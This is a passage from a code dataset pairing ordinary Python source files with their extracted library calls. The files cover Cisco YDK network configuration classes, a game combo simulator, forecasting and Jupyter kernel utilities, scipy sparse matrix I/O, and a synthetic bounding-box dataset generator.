\"Cisco-IOS-XR-fib-common-cfg:fib/%s\" % self._segment_path()\n self._is_frozen = True\n\n def __setattr__(self, name, value):\n self._perform_setattr(Fib.Platform, [], name, value)\n\n\n class LabelSwitchedMulticast(Entity):\n \"\"\"\n Options for label\\-switched\\-multicast parameters\n \n .. attribute:: frr_holdtime\n \n \tSet time to keep FRR slots programmed post FRR\n \t**type**\\: int\n \n \t**range:** 3..180\n \n \t**units**\\: second\n \n \n\n \"\"\"\n\n _prefix = 'fib-common-cfg'\n _revision = '2017-05-01'\n\n def __init__(self):\n super(Fib.Platform.LabelSwitchedMulticast, self).__init__()\n\n self.yang_name = \"label-switched-multicast\"\n self.yang_parent_name = \"platform\"\n self.is_top_level_class = False\n self.has_list_ancestor = False\n self.ylist_key_names = []\n self._child_classes = OrderedDict([])\n self._leafs = OrderedDict([\n ('frr_holdtime', (YLeaf(YType.uint32, 'frr-holdtime'), ['int'])),\n ])\n self.frr_holdtime = None\n self._segment_path = lambda: \"label-switched-multicast\"\n self._absolute_path = lambda: \"Cisco-IOS-XR-fib-common-cfg:fib/platform/%s\" % self._segment_path()\n self._is_frozen = True\n\n def __setattr__(self, name, value):\n self._perform_setattr(Fib.Platform.LabelSwitchedMulticast, ['frr_holdtime'], name, value)\n\n def clone_ptr(self):\n self._top_entity = Fib()\n return self._top_entity\n\n"},"apis":{"kind":"list like","value":["collections.OrderedDict","ydk.types.YLeafList","ydk.types.YLeaf","ydk.types.YList","ydk.types.Enum.YLeaf"],"string":"[\n \"collections.OrderedDict\",\n \"ydk.types.YLeafList\",\n \"ydk.types.YLeaf\",\n \"ydk.types.YList\",\n \"ydk.types.Enum.YLeaf\"\n]"},"extract_api":{"kind":"string","value":"[((906, 927), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(1)', '\"\"\"list\"\"\"'], {}), \"(1, 'list')\\n\", (916, 927), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((939, 959), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(2)', '\"\"\"any\"\"\"'], {}), \"(2, 'any')\\n\", (949, 959), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((972, 993), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(3)', '\"\"\"drop\"\"\"'], {}), \"(3, 'drop')\\n\", (982, 993), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((1161, 1181), 'ydk.types.Enum.YLeaf', 'Enum.YLeaf', (['(8)', '\"\"\"any\"\"\"'], {}), \"(8, 'any')\\n\", (1171, 1181), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((2597, 2761), 'collections.OrderedDict', 'OrderedDict', ([\"[('pbts-forward-class-fallbacks', ('pbts_forward_class_fallbacks', Fib.\\n PbtsForwardClassFallbacks)), ('platform', ('platform', Fib.Platform))]\"], {}), \"([('pbts-forward-class-fallbacks', (\\n 'pbts_forward_class_fallbacks', Fib.PbtsForwardClassFallbacks)), (\\n 'platform', ('platform', Fib.Platform))])\\n\", (2608, 2761), False, 'from collections import OrderedDict\\n'), ((4804, 4943), 'collections.OrderedDict', 'OrderedDict', ([\"[('pbts-forward-class-fallback', ('pbts_forward_class_fallback', Fib.\\n PbtsForwardClassFallbacks.PbtsForwardClassFallback))]\"], {}), \"([('pbts-forward-class-fallback', ('pbts_forward_class_fallback',\\n Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback))])\\n\", (4815, 4943), False, 'from collections import OrderedDict\\n'), ((4966, 4979), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\\n', (4977, 4979), False, 'from collections import OrderedDict\\n'), ((5028, 5039), 'ydk.types.YList', 'YList', (['self'], {}), '(self)\\n', (5033, 5039), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((8949, 9064), 'collections.OrderedDict', 'OrderedDict', ([\"[('label-switched-multicast', ('label_switched_multicast', Fib.Platform.\\n LabelSwitchedMulticast))]\"], {}), \"([('label-switched-multicast', ('label_switched_multicast', Fib.\\n Platform.LabelSwitchedMulticast))])\\n\", (8960, 9064), False, 'from collections import OrderedDict\\n'), ((9086, 9099), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\\n', (9097, 9099), False, 'from collections import OrderedDict\\n'), ((6945, 6960), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\\n', (6956, 6960), False, 'from collections import OrderedDict\\n'), ((10516, 10531), 'collections.OrderedDict', 'OrderedDict', (['[]'], {}), '([])\\n', (10527, 10531), False, 'from collections import OrderedDict\\n'), ((2823, 2864), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '\"\"\"auto-hash-recover\"\"\"'], {}), \"(YType.boolean, 'auto-hash-recover')\\n\", (2828, 2864), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((2913, 2954), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '\"\"\"prefer-aib-routes\"\"\"'], {}), \"(YType.boolean, 'prefer-aib-routes')\\n\", (2918, 2954), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((3007, 3052), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '\"\"\"encap-sharing-disable\"\"\"'], {}), \"(YType.boolean, 'encap-sharing-disable')\\n\", (3012, 3052), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((3102, 3144), 'ydk.types.YLeaf', 'YLeaf', (['YType.boolean', '\"\"\"frr-follow-bgp-pic\"\"\"'], {}), \"(YType.boolean, 'frr-follow-bgp-pic')\\n\", (3107, 3144), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((7051, 7091), 'ydk.types.YLeaf', 'YLeaf', (['YType.str', '\"\"\"forward-class-number\"\"\"'], {}), \"(YType.str, 'forward-class-number')\\n\", (7056, 7091), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((7226, 7267), 'ydk.types.YLeaf', 'YLeaf', (['YType.enumeration', '\"\"\"fallback-type\"\"\"'], {}), \"(YType.enumeration, 'fallback-type')\\n\", (7231, 7267), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((7406, 7460), 'ydk.types.YLeafList', 'YLeafList', (['YType.uint32', '\"\"\"fallback-class-number-array\"\"\"'], {}), \"(YType.uint32, 'fallback-class-number-array')\\n\", (7415, 7460), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n'), ((10614, 10649), 'ydk.types.YLeaf', 'YLeaf', (['YType.uint32', '\"\"\"frr-holdtime\"\"\"'], {}), \"(YType.uint32, 'frr-holdtime')\\n\", (10619, 10649), False, 'from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\\n')]"}}},{"rowIdx":770,"cells":{"code":{"kind":"string","value":"\"\"\"Series of actions that form a combo chain\"\"\"\nfrom __future__ import annotations\nfrom typing import Optional, Sequence, TYPE_CHECKING\n\nfrom action import Action\nfrom core.utility import Array\nfrom core.constants import PlayerForm, SimActKind, MomentType\nfrom core.database import FromDB\n\nif TYPE_CHECKING:\n from entity.player import Player\n\n\nclass Combos:\n def __init__(self, player: Player, form: PlayerForm, act_ids: Sequence[int], ex_act_ids: Optional[Sequence[int]] = None) -> None:\n self.player = player\n self.actions: Array[Action] = Array()\n for idx, act_id in enumerate(act_ids):\n self.actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1))\n self.ex_actions = None\n if ex_act_ids:\n self.ex_actions: Array[Action] = Array()\n for idx, act_id in enumerate(ex_act_ids):\n if not act_id:\n self.ex_actions.append(None)\n continue\n self.ex_actions.append(Action(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1))\n\n def next(self):\n if self.player.current in self.actions:\n try:\n return self.actions[self.player.current.index + 1]\n except IndexError:\n pass\n return self.actions[1]\n\n def __repr__(self) -> str:\n if self.ex_actions:\n return \"->\".join(map(repr, self.actions)) + \"\\tEX[\" + \"->\".join(map(repr, self.ex_actions)) + \"]\"\n return \"->\".join(map(repr, self.actions))\n\n\nclass UniqueCombos(Combos, FromDB, table=\"CharaUniqueCombo\"):\n def __init__(self, id: int, player: Player) -> None:\n FromDB.__init__(self, id)\n act_ids = (self._data[\"_ActionId\"] + i for i in range(self._data[\"_MaxComboNum\"]))\n ex_act_ids = None if not self._data[\"_ExActionId\"] else (self._data[\"_ExActionId\"] + i for i in range(self._data[\"_MaxComboNum\"]))\n Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids)\n if self._data[\"_ShiftConditionType\"] == 1:\n self.player.events.listen(MomentType.HIT, self.enable)\n\n def enable(self, *args, **kwargs):\n pass\n\n\nclass DefaultCombos(Combos, FromDB, table=\"WeaponType\"):\n def __init__(self, id: int, player: Player) -> None:\n FromDB.__init__(self, id)\n act_ids = (self._data[f\"_DefaultSkill{i+1:02}\"] for i in range(5) if self._data[f\"_DefaultSkill{i+1:02}\"])\n ex_act_ids = None if not self._data[\"_DefaultSkill05Ex\"] else (0, 0, 0, 0, self._data[\"_DefaultSkill05Ex\"])\n Combos.__init__(self, player, PlayerForm.ADV, act_ids, ex_act_ids=ex_act_ids)\n\n\nclass DragonCombos(Combos):\n def __init__(self, id: int, combo_max: int, player: Player) -> None:\n act_ids = (id + i for i in range(combo_max))\n Combos.__init__(self, player, PlayerForm.DRG, act_ids)\n"},"apis":{"kind":"list like","value":["core.utility.Array","action.Action","core.database.FromDB.__init__"],"string":"[\n \"core.utility.Array\",\n \"action.Action\",\n \"core.database.FromDB.__init__\"\n]"},"extract_api":{"kind":"string","value":"[((562, 569), 'core.utility.Array', 'Array', ([], {}), '()\\n', (567, 569), False, 'from core.utility import Array\\n'), ((1689, 1714), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\\n', (1704, 1714), False, 'from core.database import FromDB\\n'), ((2326, 2351), 'core.database.FromDB.__init__', 'FromDB.__init__', (['self', 'id'], {}), '(self, id)\\n', (2341, 2351), False, 'from core.database import FromDB\\n'), ((821, 828), 'core.utility.Array', 'Array', ([], {}), '()\\n', (826, 828), False, 'from core.utility import Array\\n'), ((649, 720), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\\n', (655, 720), False, 'from action import Action\\n'), ((1031, 1102), 'action.Action', 'Action', (['act_id', 'player'], {'kind': 'SimActKind.COMBO', 'form': 'form', 'index': '(idx + 1)'}), '(act_id, player, kind=SimActKind.COMBO, form=form, index=idx + 1)\\n', (1037, 1102), False, 'from action import Action\\n')]"}}},{"rowIdx":771,"cells":{"code":{"kind":"string","value":"#!/usr/bin/env python3 -u\n# -*- coding: utf-8 -*-\n\n__author__ = [\"\"]\n__all__ = [\"_StatsModelsAdapter\"]\n\nimport numpy as np\nimport pandas as pd\n\nfrom sktime.forecasting.base._base import DEFAULT_ALPHA\nfrom sktime.forecasting.base._sktime import _OptionalForecastingHorizonMixin\nfrom sktime.forecasting.base._sktime import _SktimeForecaster\n\n\nclass _StatsModelsAdapter(_OptionalForecastingHorizonMixin, _SktimeForecaster):\n \"\"\"Base class for interfacing statsmodels forecasting algorithms\"\"\"\n\n _fitted_param_names = ()\n\n def __init__(self):\n self._forecaster = None\n self._fitted_forecaster = None\n super(_StatsModelsAdapter, self).__init__()\n\n def fit(self, y, X=None, fh=None):\n \"\"\"Fit to training data.\n\n Parameters\n ----------\n y : pd.Series\n Target time series to which to fit the forecaster.\n fh : int, list or np.array, optional (default=None)\n The forecasters horizon with the steps ahead to to predict.\n X : pd.DataFrame, optional (default=None)\n Exogenous variables are ignored\n Returns\n -------\n self : returns an instance of self.\n \"\"\"\n # statsmodels does not support the pd.Int64Index as required,\n # so we coerce them here to pd.RangeIndex\n if isinstance(y, pd.Series) and type(y.index) == pd.Int64Index:\n y, X = _coerce_int_to_range_index(y, X)\n\n self._set_y_X(y, X)\n self._set_fh(fh)\n self._fit_forecaster(y, X)\n self._is_fitted = True\n return self\n\n def _fit_forecaster(self, y_train, X_train=None):\n \"\"\"Internal fit\"\"\"\n raise NotImplementedError(\"abstract method\")\n\n def _predict(self, fh, X=None, return_pred_int=False, alpha=DEFAULT_ALPHA):\n \"\"\"\n Make forecasts.\n\n Parameters\n ----------\n fh : ForecastingHorizon\n The forecasters horizon with the steps ahead to to predict.\n Default is one-step ahead forecast,\n i.e. np.array([1])\n X : pd.DataFrame, optional (default=None)\n Exogenous variables are ignored.\n return_pred_int : bool, optional (default=False)\n alpha : int or list, optional (default=0.95)\n\n Returns\n -------\n y_pred : pd.Series\n Returns series of predicted values.\n \"\"\"\n if return_pred_int:\n raise NotImplementedError()\n\n # statsmodels requires zero-based indexing starting at the\n # beginning of the training series when passing integers\n start, end = fh.to_absolute_int(self._y.index[0], self.cutoff)[[0, -1]]\n y_pred = self._fitted_forecaster.predict(start, end)\n\n # statsmodels forecasts all periods from start to end of forecasting\n # horizon, but only return given time points in forecasting horizon\n return y_pred.loc[fh.to_absolute(self.cutoff).to_pandas()]\n\n def get_fitted_params(self):\n \"\"\"Get fitted parameters\n\n Returns\n -------\n fitted_params : dict\n \"\"\"\n self.check_is_fitted()\n return {\n name: self._fitted_forecaster.params.get(name)\n for name in self._get_fitted_param_names()\n }\n\n def _get_fitted_param_names(self):\n \"\"\"Get names of fitted parameters\"\"\"\n return self._fitted_param_names\n\n\ndef _coerce_int_to_range_index(y, X=None):\n new_index = pd.RangeIndex(y.index[0], y.index[-1] + 1)\n try:\n np.testing.assert_array_equal(y.index, new_index)\n except AssertionError:\n raise ValueError(\n \"Coercion of pd.Int64Index to pd.RangeIndex \"\n \"failed. Please provide `y_train` with a \"\n \"pd.RangeIndex.\"\n )\n y.index = new_index\n if X is not None:\n X.index = new_index\n return y, X\n"},"apis":{"kind":"list like","value":["numpy.testing.assert_array_equal","pandas.RangeIndex"],"string":"[\n \"numpy.testing.assert_array_equal\",\n \"pandas.RangeIndex\"\n]"},"extract_api":{"kind":"string","value":"[((3433, 3475), 'pandas.RangeIndex', 'pd.RangeIndex', (['y.index[0]', '(y.index[-1] + 1)'], {}), '(y.index[0], y.index[-1] + 1)\\n', (3446, 3475), True, 'import pandas as pd\\n'), ((3493, 3542), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['y.index', 'new_index'], {}), '(y.index, new_index)\\n', (3522, 3542), True, 'import numpy as np\\n')]"}}},{"rowIdx":772,"cells":{"code":{"kind":"string","value":"\"\"\"Find kernel specifications for a given language\"\"\"\n\nimport os\nimport sys\n\nfrom .languages import same_language\nfrom .reraise import reraise\n\ntry:\n # I prefer not to take a dependency on jupyter_client\n from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\nexcept ImportError as err:\n find_kernel_specs = reraise(err)\n get_kernel_spec = reraise(err)\n\n\ndef set_kernelspec_from_language(notebook):\n \"\"\"Set the kernel specification based on the 'main_language' metadata\"\"\"\n language = notebook.metadata.get(\"jupytext\", {}).get(\"main_language\")\n if \"kernelspec\" not in notebook.metadata and language:\n try:\n kernelspec = kernelspec_from_language(language)\n except ValueError:\n return\n notebook.metadata[\"kernelspec\"] = kernelspec\n notebook.metadata.get(\"jupytext\", {}).pop(\"main_language\")\n\n\ndef kernelspec_from_language(language):\n \"\"\"Return the python kernel that matches the current env, or the first kernel that matches the given language\"\"\"\n if language == \"python\":\n # Return the kernel that matches the current Python executable\n for name in find_kernel_specs():\n kernel_specs = get_kernel_spec(name)\n cmd = kernel_specs.argv[0]\n if (\n kernel_specs.language == \"python\"\n and os.path.isfile(cmd)\n and os.path.samefile(cmd, sys.executable)\n ):\n return {\n \"name\": name,\n \"language\": language,\n \"display_name\": kernel_specs.display_name,\n }\n raise ValueError(\n \"No kernel found that matches the current python executable {}\\n\".format(\n sys.executable\n )\n + \"Install one with 'python -m ipykernel install --name kernel_name [--user]'\"\n )\n\n for name in find_kernel_specs():\n kernel_specs = get_kernel_spec(name)\n if same_language(kernel_specs.language, language):\n return {\n \"name\": name,\n \"language\": language,\n \"display_name\": kernel_specs.display_name,\n }\n\n raise ValueError(\"No kernel found for the language {}\".format(language))\n"},"apis":{"kind":"list like","value":["jupyter_client.kernelspec.find_kernel_specs","jupyter_client.kernelspec.get_kernel_spec","os.path.samefile","os.path.isfile"],"string":"[\n \"jupyter_client.kernelspec.find_kernel_specs\",\n \"jupyter_client.kernelspec.get_kernel_spec\",\n \"os.path.samefile\",\n \"os.path.isfile\"\n]"},"extract_api":{"kind":"string","value":"[((1903, 1922), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\\n', (1920, 1922), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\\n'), ((1157, 1176), 'jupyter_client.kernelspec.find_kernel_specs', 'find_kernel_specs', ([], {}), '()\\n', (1174, 1176), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\\n'), ((1947, 1968), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\\n', (1962, 1968), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\\n'), ((1205, 1226), 'jupyter_client.kernelspec.get_kernel_spec', 'get_kernel_spec', (['name'], {}), '(name)\\n', (1220, 1226), False, 'from jupyter_client.kernelspec import find_kernel_specs, get_kernel_spec\\n'), ((1353, 1372), 'os.path.isfile', 'os.path.isfile', (['cmd'], {}), '(cmd)\\n', (1367, 1372), False, 'import os\\n'), ((1393, 1430), 'os.path.samefile', 'os.path.samefile', (['cmd', 'sys.executable'], {}), '(cmd, sys.executable)\\n', (1409, 1430), False, 'import os\\n')]"}}},{"rowIdx":773,"cells":{"code":{"kind":"string","value":"import numpy as np\nimport scipy.sparse\n\n__all__ = ['save_npz', 'load_npz']\n\n\n# Make loading safe vs. malicious input\nPICKLE_KWARGS = dict(allow_pickle=False)\n\n\ndef save_npz(file, matrix, compressed=True):\n \"\"\" Save a sparse matrix to a file using ``.npz`` format.\n\n Parameters\n ----------\n file : str or file-like object\n Either the file name (string) or an open file (file-like object)\n where the data will be saved. If file is a string, the ``.npz``\n extension will be appended to the file name if it is not already\n there.\n matrix: spmatrix (format: ``csc``, ``csr``, ``bsr``, ``dia`` or coo``)\n The sparse matrix to save.\n compressed : bool, optional\n Allow compressing the file. Default: True\n\n See Also\n --------\n scipy.sparse.load_npz: Load a sparse matrix from a file using ``.npz`` format.\n numpy.savez: Save several arrays into a ``.npz`` archive.\n numpy.savez_compressed : Save several arrays into a compressed ``.npz`` archive.\n\n Examples\n --------\n Store sparse matrix to disk, and load it again:\n\n >>> import scipy.sparse\n >>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]]))\n >>> sparse_matrix\n <2x3 sparse matrix of type ''\n with 2 stored elements in Compressed Sparse Column format>\n >>> sparse_matrix.todense()\n matrix([[0, 0, 3],\n [4, 0, 0]], dtype=int64)\n\n >>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix)\n >>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz')\n\n >>> sparse_matrix\n <2x3 sparse matrix of type ''\n with 2 stored elements in Compressed Sparse Column format>\n >>> sparse_matrix.todense()\n matrix([[0, 0, 3],\n [4, 0, 0]], dtype=int64)\n \"\"\"\n arrays_dict = {}\n if matrix.format in ('csc', 'csr', 'bsr'):\n arrays_dict.update(indices=matrix.indices, indptr=matrix.indptr)\n elif matrix.format == 'dia':\n arrays_dict.update(offsets=matrix.offsets)\n elif matrix.format == 'coo':\n arrays_dict.update(row=matrix.row, col=matrix.col)\n else:\n raise NotImplementedError('Save is not implemented for sparse matrix of format {}.'.format(matrix.format))\n arrays_dict.update(\n format=matrix.format.encode('ascii'),\n shape=matrix.shape,\n data=matrix.data\n )\n if compressed:\n np.savez_compressed(file, **arrays_dict)\n else:\n np.savez(file, **arrays_dict)\n\n\ndef load_npz(file):\n \"\"\" Load a sparse matrix from a file using ``.npz`` format.\n\n Parameters\n ----------\n file : str or file-like object\n Either the file name (string) or an open file (file-like object)\n where the data will be loaded.\n\n Returns\n -------\n result : csc_matrix, csr_matrix, bsr_matrix, dia_matrix or coo_matrix\n A sparse matrix containing the loaded data.\n\n Raises\n ------\n OSError\n If the input file does not exist or cannot be read.\n\n See Also\n --------\n scipy.sparse.save_npz: Save a sparse matrix to a file using ``.npz`` format.\n numpy.load: Load several arrays from a ``.npz`` archive.\n\n Examples\n --------\n Store sparse matrix to disk, and load it again:\n\n >>> import scipy.sparse\n >>> sparse_matrix = scipy.sparse.csc_matrix(np.array([[0, 0, 3], [4, 0, 0]]))\n >>> sparse_matrix\n <2x3 sparse matrix of type ''\n with 2 stored elements in Compressed Sparse Column format>\n >>> sparse_matrix.todense()\n matrix([[0, 0, 3],\n [4, 0, 0]], dtype=int64)\n\n >>> scipy.sparse.save_npz('/tmp/sparse_matrix.npz', sparse_matrix)\n >>> sparse_matrix = scipy.sparse.load_npz('/tmp/sparse_matrix.npz')\n\n >>> sparse_matrix\n <2x3 sparse matrix of type ''\n with 2 stored elements in Compressed Sparse Column format>\n >>> sparse_matrix.todense()\n matrix([[0, 0, 3],\n [4, 0, 0]], dtype=int64)\n \"\"\"\n\n with np.load(file, **PICKLE_KWARGS) as loaded:\n try:\n matrix_format = loaded['format']\n except KeyError as e:\n raise ValueError('The file {} does not contain a sparse matrix.'.format(file)) from e\n\n matrix_format = matrix_format.item()\n\n if not isinstance(matrix_format, str):\n # Play safe with Python 2 vs 3 backward compatibility;\n # files saved with SciPy < 1.0.0 may contain unicode or bytes.\n matrix_format = matrix_format.decode('ascii')\n\n try:\n cls = getattr(scipy.sparse, '{}_matrix'.format(matrix_format))\n except AttributeError as e:\n raise ValueError('Unknown matrix format \"{}\"'.format(matrix_format)) from e\n\n if matrix_format in ('csc', 'csr', 'bsr'):\n return cls((loaded['data'], loaded['indices'], loaded['indptr']), shape=loaded['shape'])\n elif matrix_format == 'dia':\n return cls((loaded['data'], loaded['offsets']), shape=loaded['shape'])\n elif matrix_format == 'coo':\n return cls((loaded['data'], (loaded['row'], loaded['col'])), shape=loaded['shape'])\n else:\n raise NotImplementedError('Load is not implemented for '\n 'sparse matrix of format {}.'.format(matrix_format))\n"},"apis":{"kind":"list like","value":["numpy.savez_compressed","numpy.load","numpy.savez"],"string":"[\n \"numpy.savez_compressed\",\n \"numpy.load\",\n \"numpy.savez\"\n]"},"extract_api":{"kind":"string","value":"[((2426, 2466), 'numpy.savez_compressed', 'np.savez_compressed', (['file'], {}), '(file, **arrays_dict)\\n', (2445, 2466), True, 'import numpy as np\\n'), ((2485, 2514), 'numpy.savez', 'np.savez', (['file'], {}), '(file, **arrays_dict)\\n', (2493, 2514), True, 'import numpy as np\\n'), ((4018, 4048), 'numpy.load', 'np.load', (['file'], {}), '(file, **PICKLE_KWARGS)\\n', (4025, 4048), True, 'import numpy as np\\n')]"}}},{"rowIdx":774,"cells":{"code":{"kind":"string","value":"# Copyright 2022 Collate\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nTestCase builder\n\"\"\"\n\nfrom metadata.generated.schema.api.tests.createTableTest import CreateTableTestRequest\nfrom metadata.generated.schema.tests.table import tableRowCountToEqual\nfrom metadata.generated.schema.tests.tableTest import TableTestType\nfrom metadata.great_expectations.builders.table.base_table_test_builders import (\n BaseTableTestBuilder,\n)\n\n\nclass TableRowCountToEqualBuilder(BaseTableTestBuilder):\n \"\"\"Builder for `expect_table_row_count_to_equal` GE expectation\"\"\"\n\n def _build_test(self) -> CreateTableTestRequest:\n \"\"\"Specific test builder for the test\"\"\"\n return self.build_test_request(\n config=tableRowCountToEqual.TableRowCountToEqual(\n value=self.result[\"expectation_config\"][\"kwargs\"][\"value\"],\n ),\n test_type=TableTestType.tableRowCountToEqual,\n )\n"},"apis":{"kind":"list like","value":["metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual"],"string":"[\n \"metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual\"\n]"},"extract_api":{"kind":"string","value":"[((1225, 1331), 'metadata.generated.schema.tests.table.tableRowCountToEqual.TableRowCountToEqual', 'tableRowCountToEqual.TableRowCountToEqual', ([], {'value': \"self.result['expectation_config']['kwargs']['value']\"}), \"(value=self.result[\\n 'expectation_config']['kwargs']['value'])\\n\", (1266, 1331), False, 'from metadata.generated.schema.tests.table import tableRowCountToEqual\\n')]"}}},{"rowIdx":775,"cells":{"code":{"kind":"string","value":"'''\nThis code is based on https://github.com/jrieke/shape-detection/\n'''\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nimport tensorflow as tf\nimport datetime\n\nclass JriekeBboxDataset:\n def generate(self):\n print('Generating...')\n\n self.WIDTH = 8\n self.HEIGHT = 8\n num_imgs = 50000\n min_object_size = 1\n max_object_size = 4\n num_objects = 1\n\n self.bboxes = np.zeros((num_imgs, num_objects, 4))\n self.imgs = np.zeros((num_imgs, self.WIDTH, self.HEIGHT)) # set background to 0\n\n for i_img in range(num_imgs):\n for i_object in range(num_objects):\n w, h = np.random.randint(min_object_size, max_object_size, size=2)\n x = np.random.randint(0, self.WIDTH - w)\n y = np.random.randint(0, self.HEIGHT - h)\n self.imgs[i_img, y:y+h, x:x+w] = 1. # set rectangle to 1\n self.bboxes[i_img, i_object] = [x, y, w, h]\n\n print(\"Shapes: imgs \", self.imgs.shape, \" bboxes \", self.bboxes.shape)\n\n #why this?\n # X = (self.imgs.reshape(num_imgs, -1) - np.mean(self.imgs)) / np.std(self.imgs)\n X = self.imgs\n\n y = self.bboxes.reshape(num_imgs, -1) / self.WIDTH\n\n # Split training and test.\n i = int(0.8 * num_imgs)\n train_X = X[:i] #80% for training\n test_X = X[i:]\n train_y = y[:i]\n test_y = y[i:]\n self.test_imgs = self.imgs[i:]\n self.test_bboxes = self.bboxes[i:]\n\n return train_X, train_y, test_X, test_y\n\n def check_dataset_image_compability(self, test_X_sample, test_imgs_sample):\n fig = plt.figure(figsize=(12, 3))\n fig.suptitle('check if the generated imgs match to the test_X slice image')\n fig.subplots_adjust(top=0.85)\n\n plt.subplot(1, 2, 1)\n plt.gca().set_title('Returned by the dataset class: used for training')\n plt.imshow(test_X_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n\n plt.subplot(1, 2, 2)\n plt.gca().set_title('Global image holder: used for plotting.')\n plt.imshow(test_imgs_sample, cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n plt.show()\n print('compare:',TMP,test_imgs_sample)\n\n def IOU(self,bbox1, bbox2):\n '''Calculate overlap between two bounding boxes [x, y, w, h] as the area of intersection over the area of unity'''\n x1, y1, w1, h1 = bbox1[0], bbox1[1], bbox1[2], bbox1[3]\n x2, y2, w2, h2 = bbox2[0], bbox2[1], bbox2[2], bbox2[3]\n\n w_I = min(x1 + w1, x2 + w2) - max(x1, x2)\n h_I = min(y1 + h1, y2 + h2) - max(y1, y2)\n if w_I <= 0 or h_I <= 0: # no overlap\n return 0.\n I = w_I * h_I\n\n U = w1 * h1 + w2 * h2 - I\n\n return I / U\n\n def convertDefaultAnnotToCoord(self, annot):\n '''\n annot -> [x, y, w, h]\n '''\n\n w = annot[2] * self.WIDTH\n h = annot[3] * self.HEIGHT\n\n x = annot[0] * self.HEIGHT\n y = annot[1] * self.HEIGHT\n\n return [x,y,w,h]\n\n def convertYoloAnnotToCoord(self, yolo_annot):\n '''\n yolo_annot -> [x, y, w, h]\n '''\n\n w = yolo_annot[2] * self.WIDTH\n h = yolo_annot[3] * self.HEIGHT\n\n x = (yolo_annot[0] * self.WIDTH) - (w/2)\n y = (yolo_annot[1] * self.HEIGHT) - (h/2)\n\n return [x,y,w,h]\n\n def show_generated(self, i=0):\n fig = plt.figure()\n fig.subplots_adjust(top=0.85)\n fig.suptitle('Generated image sample + GT')\n plt.imshow(self.imgs[i], cmap='Greys', interpolation='none', origin='lower', extent=[0, self.WIDTH, 0, self.HEIGHT])\n for bbox in self.bboxes[i]:\n plt.gca().add_patch(matplotlib.patches.Rectangle((bbox[0], bbox[1]), bbox[2], bbox[3], ec='r', fc='none'))\n plt.gca().legend(['GT'])\n plt.show()\n\n def plot_rectangle(self, img, bbox):\n\n fig = plt.figure()\n 